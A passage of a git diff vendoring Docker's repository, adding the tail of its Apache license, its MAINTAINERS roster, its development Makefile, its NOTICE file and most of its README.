Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative 
Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. 
Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. 
+ + END OF TERMS AND CONDITIONS + + Copyright 2013-2016 Docker, Inc. + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + https://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. diff --git a/vendor/github.com/docker/docker/MAINTAINERS b/vendor/github.com/docker/docker/MAINTAINERS new file mode 100644 index 0000000000..39bb8c1308 --- /dev/null +++ b/vendor/github.com/docker/docker/MAINTAINERS @@ -0,0 +1,376 @@ +# Docker maintainers file +# +# This file describes who runs the docker/docker project and how. +# This is a living document - if you see something out of date or missing, speak up! +# +# It is structured to be consumable by both humans and programs. +# To extract its contents programmatically, use any TOML-compliant +# parser. +# +# This file is compiled into the MAINTAINERS file in docker/opensource. +# +[Org] + + [Org."Core maintainers"] + + # The Core maintainers are the ghostbusters of the project: when there's a problem others + # can't solve, they show up and fix it with bizarre devices and weaponry. + # They have final say on technical implementation and coding style. + # They are ultimately responsible for quality in all its forms: usability polish, + # bugfixes, performance, stability, etc. When ownership can cleanly be passed to + # a subsystem, they are responsible for doing so and holding the + # subsystem maintainers accountable. If ownership is unclear, they are the de facto owners. + + # For each release (including minor releases), a "release captain" is assigned from the + # pool of core maintainers. 
Rotation is encouraged across all maintainers, to ensure + # the release process is clear and up-to-date. + + people = [ + "aaronlehmann", + "akihirosuda", + "aluzzardi", + "anusha", + "coolljt0725", + "cpuguy83", + "crosbymichael", + "dnephin", + "duglin", + "estesp", + "icecrime", + "jhowardmsft", + "justincormack", + "lk4d4", + "mavenugo", + "mhbauer", + "mlaventure", + "mrjana", + "runcom", + "stevvooe", + "tianon", + "tibor", + "tonistiigi", + "unclejack", + "vdemeester", + "vieux" + ] + + [Org."Docs maintainers"] + + # TODO Describe the docs maintainers role. + + people = [ + "jamtur01", + "misty", + "sven", + "thajeztah" + ] + + [Org.Curators] + + # The curators help ensure that incoming issues and pull requests are properly triaged and + # that our various contribution and reviewing processes are respected. With their knowledge of + # the repository activity, they can also guide contributors to relevant material or + # discussions. + # + # They are neither code nor docs reviewers, so they are never expected to merge. They can + # however: + # - close an issue or pull request when it's an exact duplicate + # - close an issue or pull request when it's inappropriate or off-topic + + people = [ + "aboch", + "andrewhsu", + "ehazlett", + "mgoelzer", + "programmerq", + "thajeztah" + ] + + [Org.Alumni] + + # This list contains maintainers that are no longer active on the project. + # It is thanks to these people that the project has become what it is today. + # Thank you! + + people = [ + # David Calavera contributed many features to Docker, such as an improved + # event system, dynamic configuration reloading, volume plugins, fancy + # new templating options, and an external client credential store. As a + # maintainer, David was release captain for Docker 1.8, and competing + # with Jess Frazelle to be "top dream killer". + # David is now doing amazing stuff as CTO for https://www.netlify.com, + # and tweets as @calavera. 
+ "calavera", + + # As a maintainer, Erik was responsible for the "builder", and + # started the first designs for the new networking model in + # Docker. Erik is now working on all kinds of plugins for Docker + # (https://github.com/contiv) and various open source projects + # in his own repository https://github.com/erikh. You may + # still stumble into him in our issue tracker, or on IRC. + "erikh", + + # Jessica Frazelle, also known as the "Keyser Söze of containers", + # runs *everything* in containers. She started contributing to + # Docker with a (fun fun) change involving both iptables and regular + # expressions (coz, YOLO!) on July 10, 2014 + # https://github.com/docker/docker/pull/6950/commits/f3a68ffa390fb851115c77783fa4031f1d3b2995. + # Jess was Release Captain for Docker 1.4, 1.6 and 1.7, and contributed + # many features and improvement, among which "seccomp profiles" (making + # containers a lot more secure). Besides being a maintainer, she + # set up the CI infrastructure for the project, giving everyone + # something to shout at if a PR failed ("noooo Janky!"). + # Jess is currently working on the DCOS security team at Mesosphere, + # and contributing to various open source projects. + # Be sure you don't miss her talks at a conference near you (a must-see), + # read her blog at https://blog.jessfraz.com (a must-read), and + # check out her open source projects on GitHub https://github.com/jessfraz (a must-try). + "jessfraz", + + # As a docs maintainer, Mary Anthony contributed greatly to the Docker + # docs. She wrote the Docker Contributor Guide and Getting Started + # Guides. She helped create a doc build system independent of + # docker/docker project, and implemented a new docs.docker.com theme and + # nav for 2015 Dockercon. Fun fact: the most inherited layer in DockerHub + # public repositories was originally referenced in + # maryatdocker/docker-whale back in May 2015. + "moxiegirl", + + # Vincent "vbatts!" 
Batts made his first contribution to the project + # in November 2013, to become a maintainer a few months later, on + # May 10, 2014 (https://github.com/docker/docker/commit/d6e666a87a01a5634c250358a94c814bf26cb778). + # As a maintainer, Vincent made important contributions to core elements + # of Docker, such as "distribution" (tarsum) and graphdrivers (btrfs, devicemapper). + # He also contributed the "tar-split" library, an important element + # for the content-addressable store. + # Vincent is currently a member of the Open Containers Initiative + # Technical Oversight Board (TOB), besides his work at Red Hat and + # Project Atomic. You can still find him regularly hanging out in + # our repository and the #docker-dev and #docker-maintainers IRC channels + # for a chat, as he's always a lot of fun. + "vbatts", + + # Vishnu became a maintainer to help out on the daemon codebase and + # libcontainer integration. He's currently involved in the + # Open Containers Initiative, working on the specifications, + # besides his work on cAdvisor and Kubernetes for Google. + "vishh" + ] + +[people] + +# A reference list of all people associated with the project. +# All other sections should refer to people by their canonical key +# in the people section. 
+ + # ADD YOURSELF HERE IN ALPHABETICAL ORDER + + [people.aaronlehmann] + Name = "Aaron Lehmann" + Email = "aaron.lehmann@docker.com" + GitHub = "aaronlehmann" + + [people.aboch] + Name = "Alessandro Boch" + Email = "aboch@docker.com" + GitHub = "aboch" + + [people.akihirosuda] + Name = "Akihiro Suda" + Email = "suda.akihiro@lab.ntt.co.jp" + GitHub = "AkihiroSuda" + + [people.aluzzardi] + Name = "Andrea Luzzardi" + Email = "al@docker.com" + GitHub = "aluzzardi" + + [people.andrewhsu] + Name = "Andrew Hsu" + Email = "andrewhsu@docker.com" + GitHub = "andrewhsu" + + [people.anusha] + Name = "Anusha Ragunathan" + Email = "anusha@docker.com" + GitHub = "anusha-ragunathan" + + [people.calavera] + Name = "David Calavera" + Email = "david.calavera@gmail.com" + GitHub = "calavera" + + [people.coolljt0725] + Name = "Lei Jitang" + Email = "leijitang@huawei.com" + GitHub = "coolljt0725" + + [people.cpuguy83] + Name = "Brian Goff" + Email = "cpuguy83@gmail.com" + Github = "cpuguy83" + + [people.crosbymichael] + Name = "Michael Crosby" + Email = "crosbymichael@gmail.com" + GitHub = "crosbymichael" + + [people.dnephin] + Name = "Daniel Nephin" + Email = "dnephin@gmail.com" + GitHub = "dnephin" + + [people.duglin] + Name = "Doug Davis" + Email = "dug@us.ibm.com" + GitHub = "duglin" + + [people.ehazlett] + Name = "Evan Hazlett" + Email = "ejhazlett@gmail.com" + GitHub = "ehazlett" + + [people.erikh] + Name = "Erik Hollensbe" + Email = "erik@docker.com" + GitHub = "erikh" + + [people.estesp] + Name = "Phil Estes" + Email = "estesp@linux.vnet.ibm.com" + GitHub = "estesp" + + [people.icecrime] + Name = "Arnaud Porterie" + Email = "arnaud@docker.com" + GitHub = "icecrime" + + [people.jamtur01] + Name = "James Turnbull" + Email = "james@lovedthanlost.net" + GitHub = "jamtur01" + + [people.jhowardmsft] + Name = "John Howard" + Email = "jhoward@microsoft.com" + GitHub = "jhowardmsft" + + [people.jessfraz] + Name = "Jessie Frazelle" + Email = "jess@linux.com" + GitHub = "jessfraz" + + 
[people.justincormack] + Name = "Justin Cormack" + Email = "justin.cormack@docker.com" + GitHub = "justincormack" + + [people.lk4d4] + Name = "Alexander Morozov" + Email = "lk4d4@docker.com" + GitHub = "lk4d4" + + [people.mavenugo] + Name = "Madhu Venugopal" + Email = "madhu@docker.com" + GitHub = "mavenugo" + + [people.mgoelzer] + Name = "Mike Goelzer" + Email = "mike.goelzer@docker.com" + GitHub = "mgoelzer" + + [people.mhbauer] + Name = "Morgan Bauer" + Email = "mbauer@us.ibm.com" + GitHub = "mhbauer" + + [people.misty] + Name = "Misty Stanley-Jones" + Email = "misty@docker.com" + GitHub = "mstanleyjones" + + [people.mlaventure] + Name = "Kenfe-Mickaël Laventure" + Email = "mickael.laventure@docker.com" + GitHub = "mlaventure" + + [people.moxiegirl] + Name = "Mary Anthony" + Email = "mary.anthony@docker.com" + GitHub = "moxiegirl" + + [people.mrjana] + Name = "Jana Radhakrishnan" + Email = "mrjana@docker.com" + GitHub = "mrjana" + + [people.programmerq] + Name = "Jeff Anderson" + Email = "jeff@docker.com" + GitHub = "programmerq" + + [people.runcom] + Name = "Antonio Murdaca" + Email = "runcom@redhat.com" + GitHub = "runcom" + + [people.shykes] + Name = "Solomon Hykes" + Email = "solomon@docker.com" + GitHub = "shykes" + + [people.stevvooe] + Name = "Stephen Day" + Email = "stephen.day@docker.com" + GitHub = "stevvooe" + + [people.sven] + Name = "Sven Dowideit" + Email = "SvenDowideit@home.org.au" + GitHub = "SvenDowideit" + + [people.thajeztah] + Name = "Sebastiaan van Stijn" + Email = "github@gone.nl" + GitHub = "thaJeztah" + + [people.tianon] + Name = "Tianon Gravi" + Email = "admwiggin@gmail.com" + GitHub = "tianon" + + [people.tibor] + Name = "Tibor Vass" + Email = "tibor@docker.com" + GitHub = "tiborvass" + + [people.tonistiigi] + Name = "Tõnis Tiigi" + Email = "tonis@docker.com" + GitHub = "tonistiigi" + + [people.unclejack] + Name = "Cristian Staretu" + Email = "cristian.staretu@gmail.com" + GitHub = "unclejack" + + [people.vbatts] + Name = "Vincent 
Batts" + Email = "vbatts@redhat.com" + GitHub = "vbatts" + + [people.vdemeester] + Name = "Vincent Demeester" + Email = "vincent@sbr.pm" + GitHub = "vdemeester" + + [people.vieux] + Name = "Victor Vieux" + Email = "vieux@docker.com" + GitHub = "vieux" + + [people.vishh] + Name = "Vishnu Kannan" + Email = "vishnuk@google.com" + GitHub = "vishh" diff --git a/vendor/github.com/docker/docker/Makefile b/vendor/github.com/docker/docker/Makefile new file mode 100644 index 0000000000..81bde6b4f6 --- /dev/null +++ b/vendor/github.com/docker/docker/Makefile @@ -0,0 +1,147 @@ +.PHONY: all binary build cross deb help init-go-pkg-cache install manpages rpm run shell test test-docker-py test-integration-cli test-unit tgz validate win + +# set the graph driver as the current graphdriver if not set +DOCKER_GRAPHDRIVER := $(if $(DOCKER_GRAPHDRIVER),$(DOCKER_GRAPHDRIVER),$(shell docker info 2>&1 | grep "Storage Driver" | sed 's/.*: //')) + +# get OS/Arch of docker engine +DOCKER_OSARCH := $(shell bash -c 'source hack/make/.detect-daemon-osarch && echo $${DOCKER_ENGINE_OSARCH:-$$DOCKER_CLIENT_OSARCH}') +DOCKERFILE := $(shell bash -c 'source hack/make/.detect-daemon-osarch && echo $${DOCKERFILE}') + +# env vars passed through directly to Docker's build scripts +# to allow things like `make KEEPBUNDLE=1 binary` easily +# `project/PACKAGERS.md` have some limited documentation of some of these +DOCKER_ENVS := \ + -e BUILD_APT_MIRROR \ + -e BUILDFLAGS \ + -e KEEPBUNDLE \ + -e DOCKER_BUILD_ARGS \ + -e DOCKER_BUILD_GOGC \ + -e DOCKER_BUILD_PKGS \ + -e DOCKER_DEBUG \ + -e DOCKER_EXPERIMENTAL \ + -e DOCKER_GITCOMMIT \ + -e DOCKER_GRAPHDRIVER=$(DOCKER_GRAPHDRIVER) \ + -e DOCKER_INCREMENTAL_BINARY \ + -e DOCKER_PORT \ + -e DOCKER_REMAP_ROOT \ + -e DOCKER_STORAGE_OPTS \ + -e DOCKER_USERLANDPROXY \ + -e TESTDIRS \ + -e TESTFLAGS \ + -e TIMEOUT \ + -e HTTP_PROXY \ + -e HTTPS_PROXY \ + -e NO_PROXY \ + -e http_proxy \ + -e https_proxy \ + -e no_proxy +# note: we _cannot_ add "-e DOCKER_BUILDTAGS" 
here because even if it's unset in the shell, that would shadow the "ENV DOCKER_BUILDTAGS" set in our Dockerfile, which is very important for our official builds + +# to allow `make BIND_DIR=. shell` or `make BIND_DIR= test` +# (default to no bind mount if DOCKER_HOST is set) +# note: BINDDIR is supported for backwards-compatibility here +BIND_DIR := $(if $(BINDDIR),$(BINDDIR),$(if $(DOCKER_HOST),,bundles)) +DOCKER_MOUNT := $(if $(BIND_DIR),-v "$(CURDIR)/$(BIND_DIR):/go/src/github.com/docker/docker/$(BIND_DIR)") + +# This allows the test suite to be able to run without worrying about the underlying fs used by the container running the daemon (e.g. aufs-on-aufs), so long as the host running the container is running a supported fs. +# The volume will be cleaned up when the container is removed due to `--rm`. +# Note that `BIND_DIR` will already be set to `bundles` if `DOCKER_HOST` is not set (see above BIND_DIR line), in such case this will do nothing since `DOCKER_MOUNT` will already be set. 
+DOCKER_MOUNT := $(if $(DOCKER_MOUNT),$(DOCKER_MOUNT),-v /go/src/github.com/docker/docker/bundles) + +# enable .go-pkg-cache if DOCKER_INCREMENTAL_BINARY and DOCKER_MOUNT (i.e.DOCKER_HOST) are set +PKGCACHE_DIR := $(if $(PKGCACHE_DIR),$(PKGCACHE_DIR),.go-pkg-cache) +PKGCACHE_MAP := gopath:/go/pkg goroot-linux_amd64_netgo:/usr/local/go/pkg/linux_amd64_netgo +DOCKER_MOUNT := $(if $(DOCKER_INCREMENTAL_BINARY),$(DOCKER_MOUNT) $(shell echo $(PKGCACHE_MAP) | sed -E 's@([^ ]*)@-v "$(CURDIR)/$(PKGCACHE_DIR)/\1"@g'),$(DOCKER_MOUNT)) + +GIT_BRANCH := $(shell git rev-parse --abbrev-ref HEAD 2>/dev/null) +GIT_BRANCH_CLEAN := $(shell echo $(GIT_BRANCH) | sed -e "s/[^[:alnum:]]/-/g") +DOCKER_IMAGE := docker-dev$(if $(GIT_BRANCH_CLEAN),:$(GIT_BRANCH_CLEAN)) +DOCKER_PORT_FORWARD := $(if $(DOCKER_PORT),-p "$(DOCKER_PORT)",) + +DOCKER_FLAGS := docker run --rm -i --privileged $(DOCKER_ENVS) $(DOCKER_MOUNT) $(DOCKER_PORT_FORWARD) +BUILD_APT_MIRROR := $(if $(DOCKER_BUILD_APT_MIRROR),--build-arg APT_MIRROR=$(DOCKER_BUILD_APT_MIRROR)) +export BUILD_APT_MIRROR + +# if this session isn't interactive, then we don't want to allocate a +# TTY, which would fail, but if it is interactive, we do want to attach +# so that the user can send e.g. ^C through. +INTERACTIVE := $(shell [ -t 0 ] && echo 1 || echo 0) +ifeq ($(INTERACTIVE), 1) + DOCKER_FLAGS += -t +endif + +DOCKER_RUN_DOCKER := $(DOCKER_FLAGS) "$(DOCKER_IMAGE)" + +default: binary + +all: build ## validate all checks, build linux binaries, run all tests\ncross build non-linux binaries and generate archives + $(DOCKER_RUN_DOCKER) bash -c 'hack/validate/default && hack/make.sh' + +binary: build ## build the linux binaries + $(DOCKER_RUN_DOCKER) hack/make.sh binary + +build: bundles init-go-pkg-cache + docker build ${BUILD_APT_MIRROR} ${DOCKER_BUILD_ARGS} -t "$(DOCKER_IMAGE)" -f "$(DOCKERFILE)" . 
+ +bundles: + mkdir bundles + +cross: build ## cross build the binaries for darwin, freebsd and\nwindows + $(DOCKER_RUN_DOCKER) hack/make.sh dynbinary binary cross + +deb: build ## build the deb packages + $(DOCKER_RUN_DOCKER) hack/make.sh dynbinary build-deb + + +help: ## this help + @awk 'BEGIN {FS = ":.*?## "} /^[a-zA-Z_-]+:.*?## / {sub("\\\\n",sprintf("\n%22c"," "), $$2);printf "\033[36m%-20s\033[0m %s\n", $$1, $$2}' $(MAKEFILE_LIST) + +init-go-pkg-cache: + mkdir -p $(shell echo $(PKGCACHE_MAP) | sed -E 's@([^: ]*):[^ ]*@$(PKGCACHE_DIR)/\1@g') + +install: ## install the linux binaries + KEEPBUNDLE=1 hack/make.sh install-binary + +manpages: ## Generate man pages from go source and markdown + docker build -t docker-manpage-dev -f "man/$(DOCKERFILE)" ./man + docker run --rm \ + -v $(PWD):/go/src/github.com/docker/docker/ \ + docker-manpage-dev + +rpm: build ## build the rpm packages + $(DOCKER_RUN_DOCKER) hack/make.sh dynbinary build-rpm + +run: build ## run the docker daemon in a container + $(DOCKER_RUN_DOCKER) sh -c "KEEPBUNDLE=1 hack/make.sh install-binary run" + +shell: build ## start a shell inside the build env + $(DOCKER_RUN_DOCKER) bash + +test: build ## run the unit, integration and docker-py tests + $(DOCKER_RUN_DOCKER) hack/make.sh dynbinary cross test-unit test-integration-cli test-docker-py + +test-docker-py: build ## run the docker-py tests + $(DOCKER_RUN_DOCKER) hack/make.sh dynbinary test-docker-py + +test-integration-cli: build ## run the integration tests + $(DOCKER_RUN_DOCKER) hack/make.sh build-integration-test-binary dynbinary test-integration-cli + +test-unit: build ## run the unit tests + $(DOCKER_RUN_DOCKER) hack/make.sh test-unit + +tgz: build ## build the archives (.zip on windows and .tgz\notherwise) containing the binaries + $(DOCKER_RUN_DOCKER) hack/make.sh dynbinary binary cross tgz + +validate: build ## validate DCO, Seccomp profile generation, gofmt,\n./pkg/ isolation, golint, tests, tomls, go vet and vendor + $(DOCKER_RUN_DOCKER) 
hack/validate/all + +win: build ## cross build the binary for windows + $(DOCKER_RUN_DOCKER) hack/make.sh win + +.PHONY: swagger-gen +swagger-gen: + docker run --rm -v $(PWD):/go/src/github.com/docker/docker \ + -w /go/src/github.com/docker/docker \ + --entrypoint hack/generate-swagger-api.sh \ + -e GOPATH=/go \ + quay.io/goswagger/swagger:0.7.4 diff --git a/vendor/github.com/docker/docker/NOTICE b/vendor/github.com/docker/docker/NOTICE new file mode 100644 index 0000000000..8a37c1c7bc --- /dev/null +++ b/vendor/github.com/docker/docker/NOTICE @@ -0,0 +1,19 @@ +Docker +Copyright 2012-2016 Docker, Inc. + +This product includes software developed at Docker, Inc. (https://www.docker.com). + +This product contains software (https://github.com/kr/pty) developed +by Keith Rarick, licensed under the MIT License. + +The following is courtesy of our legal counsel: + + +Use and transfer of Docker may be subject to certain restrictions by the +United States and other governments. +It is your responsibility to ensure that your use and/or transfer does not +violate applicable laws. + +For more information, please see https://www.bis.doc.gov + +See also https://www.apache.org/dev/crypto.html and/or seek legal counsel. diff --git a/vendor/github.com/docker/docker/README.md b/vendor/github.com/docker/docker/README.md new file mode 100644 index 0000000000..0b33bdca0d --- /dev/null +++ b/vendor/github.com/docker/docker/README.md @@ -0,0 +1,304 @@ +Docker: the container engine [![Release](https://img.shields.io/github/release/docker/docker.svg)](https://github.com/docker/docker/releases/latest) +============================ + +Docker is an open source project to pack, ship and run any application +as a lightweight container. + +Docker containers are both *hardware-agnostic* and *platform-agnostic*. 
+This means they can run anywhere, from your laptop to the largest +cloud compute instance and everything in between - and they don't require +you to use a particular language, framework or packaging system. That +makes them great building blocks for deploying and scaling web apps, +databases, and backend services without depending on a particular stack +or provider. + +Docker began as an open-source implementation of the deployment engine which +powered [dotCloud](http://web.archive.org/web/20130530031104/https://www.dotcloud.com/), +a popular Platform-as-a-Service. It benefits directly from the experience +accumulated over several years of large-scale operation and support of hundreds +of thousands of applications and databases. + +![Docker logo](docs/static_files/docker-logo-compressed.png "Docker") + +## Security Disclosure + +Security is very important to us. If you have any issue regarding security, +please disclose the information responsibly by sending an email to +security@docker.com and not by creating a GitHub issue. + +## Better than VMs + +A common method for distributing applications and sandboxing their +execution is to use virtual machines, or VMs. Typical VM formats are +VMware's vmdk, Oracle VirtualBox's vdi, and Amazon EC2's ami. In theory +these formats should allow every developer to automatically package +their application into a "machine" for easy distribution and deployment. +In practice, that almost never happens, for a few reasons: + + * *Size*: VMs are very large which makes them impractical to store + and transfer. + * *Performance*: running VMs consumes significant CPU and memory, + which makes them impractical in many scenarios, for example local + development of multi-tier applications, and large-scale deployment + of cpu and memory-intensive applications on large numbers of + machines. + * *Portability*: competing VM environments don't play well with each + other. 
Although conversion tools do exist, they are limited and + add even more overhead. + * *Hardware-centric*: VMs were designed with machine operators in + mind, not software developers. As a result, they offer very + limited tooling for what developers need most: building, testing + and running their software. For example, VMs offer no facilities + for application versioning, monitoring, configuration, logging or + service discovery. + +By contrast, Docker relies on a different sandboxing method known as +*containerization*. Unlike traditional virtualization, containerization +takes place at the kernel level. Most modern operating system kernels +now support the primitives necessary for containerization, including +Linux with [openvz](https://openvz.org), +[vserver](http://linux-vserver.org) and more recently +[lxc](https://linuxcontainers.org/), Solaris with +[zones](https://docs.oracle.com/cd/E26502_01/html/E29024/preface-1.html#scrolltoc), +and FreeBSD with +[Jails](https://www.freebsd.org/doc/handbook/jails.html). + +Docker builds on top of these low-level primitives to offer developers a +portable format and runtime environment that solves all four problems. +Docker containers are small (and their transfer can be optimized with +layers), they have basically zero memory and cpu overhead, they are +completely portable, and are designed from the ground up with an +application-centric design. + +Perhaps best of all, because Docker operates at the OS level, it can still be +run inside a VM! + +## Plays well with others + +Docker does not require you to buy into a particular programming +language, framework, packaging system, or configuration language. + +Is your application a Unix process? Does it use files, tcp connections, +environment variables, standard Unix streams and command-line arguments +as inputs and outputs? Then Docker can run it. + +Can your application's build be expressed as a sequence of such +commands? Then Docker can build it. 
+ +## Escape dependency hell + +A common problem for developers is the difficulty of managing all +their application's dependencies in a simple and automated way. + +This is usually difficult for several reasons: + + * *Cross-platform dependencies*. Modern applications often depend on + a combination of system libraries and binaries, language-specific + packages, framework-specific modules, internal components + developed for another project, etc. These dependencies live in + different "worlds" and require different tools - these tools + typically don't work well with each other, requiring awkward + custom integrations. + + * *Conflicting dependencies*. Different applications may depend on + different versions of the same dependency. Packaging tools handle + these situations with various degrees of ease - but they all + handle them in different and incompatible ways, which again forces + the developer to do extra work. + + * *Custom dependencies*. A developer may need to prepare a custom + version of their application's dependency. Some packaging systems + can handle custom versions of a dependency, others can't - and all + of them handle it differently. + + +Docker solves the problem of dependency hell by giving the developer a simple +way to express *all* their application's dependencies in one place, while +streamlining the process of assembling them. If this makes you think of +[XKCD 927](https://xkcd.com/927/), don't worry. Docker doesn't +*replace* your favorite packaging systems. It simply orchestrates +their use in a simple and repeatable way. How does it do that? With +layers. + +Docker defines a build as running a sequence of Unix commands, one +after the other, in the same container. Build commands modify the +contents of the container (usually by installing new files on the +filesystem), the next command modifies it some more, etc. 
Since each +build command inherits the result of the previous commands, the +*order* in which the commands are executed expresses *dependencies*. + +Here's a typical Docker build process: + +```bash +FROM ubuntu:12.04 +RUN apt-get update && apt-get install -y python python-pip curl +RUN curl -sSL https://github.com/shykes/helloflask/archive/master.tar.gz | tar -xzv +RUN cd helloflask-master && pip install -r requirements.txt +``` + +Note that Docker doesn't care *how* dependencies are built - as long +as they can be built by running a Unix command in a container. + + +Getting started +=============== + +Docker can be installed either on your computer for building applications or +on servers for running them. To get started, [check out the installation +instructions in the +documentation](https://docs.docker.com/engine/installation/). + +Usage examples +============== + +Docker can be used to run short-lived commands, long-running daemons +(app servers, databases, etc.), interactive shell sessions, etc. + +You can find a [list of real-world +examples](https://docs.docker.com/engine/examples/) in the +documentation. 
+ +Under the hood +-------------- + +Under the hood, Docker is built on the following components: + +* The + [cgroups](https://www.kernel.org/doc/Documentation/cgroup-v1/cgroups.txt) + and + [namespaces](http://man7.org/linux/man-pages/man7/namespaces.7.html) + capabilities of the Linux kernel +* The [Go](https://golang.org) programming language +* The [Docker Image Specification](https://github.com/docker/docker/blob/master/image/spec/v1.md) +* The [Libcontainer Specification](https://github.com/opencontainers/runc/blob/master/libcontainer/SPEC.md) + +Contributing to Docker [![GoDoc](https://godoc.org/github.com/docker/docker?status.svg)](https://godoc.org/github.com/docker/docker) +====================== + +| **Master** (Linux) | **Experimental** (Linux) | **Windows** | **FreeBSD** | +|------------------|----------------------|---------|---------| +| [![Jenkins Build Status](https://jenkins.dockerproject.org/view/Docker/job/Docker%20Master/badge/icon)](https://jenkins.dockerproject.org/view/Docker/job/Docker%20Master/) | [![Jenkins Build Status](https://jenkins.dockerproject.org/view/Docker/job/Docker%20Master%20%28experimental%29/badge/icon)](https://jenkins.dockerproject.org/view/Docker/job/Docker%20Master%20%28experimental%29/) | [![Build Status](http://jenkins.dockerproject.org/job/Docker%20Master%20(windows)/badge/icon)](http://jenkins.dockerproject.org/job/Docker%20Master%20(windows)/) | [![Build Status](http://jenkins.dockerproject.org/job/Docker%20Master%20(freebsd)/badge/icon)](http://jenkins.dockerproject.org/job/Docker%20Master%20(freebsd)/) | + +Want to hack on Docker? Awesome! We have [instructions to help you get +started contributing code or documentation](https://docs.docker.com/opensource/project/who-written-for/). + +These instructions are probably not perfect, please let us know if anything +feels wrong or incomplete. Better yet, submit a PR and improve them yourself. 
+ +Getting the development builds +============================== + +Want to run Docker from a master build? You can download +master builds at [master.dockerproject.org](https://master.dockerproject.org). +They are updated with each commit merged into the master branch. + +Don't know how to use that super cool new feature in the master build? Check +out the master docs at +[docs.master.dockerproject.org](http://docs.master.dockerproject.org). + +How the project is run +====================== + +Docker is a very, very active project. If you want to learn more about how it is run, +or want to get more involved, the best place to start is [the project directory](https://github.com/docker/docker/tree/master/project). + +We are always open to suggestions on process improvements, and are always looking for more maintainers. + +### Talking to other Docker users and contributors + + + + + + + + + + + + + + + + + + + + + + + + +
Internet Relay Chat (IRC) +

+ IRC is a direct line to our most knowledgeable Docker users; we have + both the #docker and #docker-dev group on + irc.freenode.net. + IRC is a rich chat protocol but it can overwhelm new users. You can search + our chat archives. +

+ Read our IRC quickstart guide for an easy way to get started. +
Docker Community Forums + The Docker Engine + group is for users of the Docker Engine project. +
Google Groups + The docker-dev group is for contributors and other people + contributing to the Docker project. You can join this group without a + Google account by sending an email to docker-dev+subscribe@googlegroups.com. + You'll receive a join-request message; simply reply to the message to + confirm your subscription. +
Twitter + You can follow Docker's Twitter feed + to get updates on our products. You can also tweet us questions or just + share blogs or stories. +
Stack Overflow + Stack Overflow has over 7000 Docker questions listed. We regularly + monitor Docker questions + and so do many other knowledgeable Docker users. +
+ +### Legal + +*Brought to you courtesy of our legal counsel. For more context, +please see the [NOTICE](https://github.com/docker/docker/blob/master/NOTICE) document in this repo.* + +Use and transfer of Docker may be subject to certain restrictions by the +United States and other governments. + +It is your responsibility to ensure that your use and/or transfer does not +violate applicable laws. + +For more information, please see https://www.bis.doc.gov + + +Licensing +========= +Docker is licensed under the Apache License, Version 2.0. See +[LICENSE](https://github.com/docker/docker/blob/master/LICENSE) for the full +license text. + +Other Docker Related Projects +============================= +There are a number of projects under development that are based on Docker's +core technology. These projects expand the tooling built around the +Docker platform to broaden its application and utility. + +* [Docker Registry](https://github.com/docker/distribution): Registry +server for Docker (hosting/delivery of repositories and images) +* [Docker Machine](https://github.com/docker/machine): Machine management +for a container-centric world +* [Docker Swarm](https://github.com/docker/swarm): A Docker-native clustering +system +* [Docker Compose](https://github.com/docker/compose) (formerly Fig): +Define and run multi-container apps +* [Kitematic](https://github.com/docker/kitematic): The easiest way to use +Docker on Mac and Windows + +If you know of another project underway that should be listed here, please help +us keep this list up-to-date by submitting a PR. + +Awesome-Docker +============== +You can find more projects, tools and articles related to Docker on the [awesome-docker 